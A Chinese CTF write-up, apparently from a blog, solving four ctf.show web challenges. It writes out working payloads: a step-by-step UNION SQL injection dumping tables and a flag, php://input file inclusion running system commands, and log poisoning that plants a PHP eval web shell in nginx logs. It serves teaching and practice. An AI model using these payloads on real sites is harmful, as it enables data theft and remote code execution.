ctf.show web 1-4 writeup

目录

web签到题

解题过程:

web2

解题过程

判断字段数和回显位

查看版本信息

爆库名

爆表名

爆列名

爆字段值

web3

解题过程

web4

解题过程

日志注入

相关学习资料:


web签到题

题目:

ctf.show平台的,题目传送门

解题过程:

打开f12,看到一串编码

base64解码,即可得到flag.

web2

题目:

解题过程

打开题目,是个登录界面,很明显的sql注入,判断是什么类型的注入

尝试用户名:admin' or 1=1#  密码:1   ,回显

好了,是字符型的。

判断字段数和回显位

回显:

可以得出有3个字段,同时回显位是2

查看版本信息

username=admin' union select 1,version(),3#&password=1

爆库名

username=admin' union select 1,database(),3#&password=1

爆表名

username=admin' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()#&password=1

爆列名

上面爆出的表名有flag,user,所以我们可以猜测我们要找的数据在flag中(如果不是还可以去找另一个)

username=admin' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='flag'#&password=1

爆字段值

username=admin' union select 1,group_concat(0x3a,flag),3 from flag#&password=1

web3

题目:

解题过程

打开题目后,如下,感觉是关于文件包含漏洞的

可以通过php伪协议php://input进行操作

php://input 可以访问请求的原始数据的只读流,将post请求中的数据作为php代码执行。

然后继续查看ctf_go_go_go,

<?php system("cat ctf_go_go_go");?>

web4

题目:

解题过程

打开后,是这样的

和web3比较类似,但是试了试发现不太行,

试试传入?url=php  回显  error    看来url过滤了php

 没啥头绪,找找师傅们的wp

日志注入

burp抓包分析后,查看响应头,发现是由nginx搭建的网站

Server: nginx/1.16.1

nginx的日志文件在/var/log/nginx/access.log和/var/log/nginx/error.log中,前者可以打开

在burp抓包,在UA中插入一句话木马

<?php eval($_POST['cmd']);?>

然后传入后,菜刀或者蚁剑进行操作就可以。

相关学习资料:

1.文件包含漏洞学习

2.日志注入漏洞

猜你喜欢

转载自blog.csdn.net/RABCDXB/article/details/113826646
今日推荐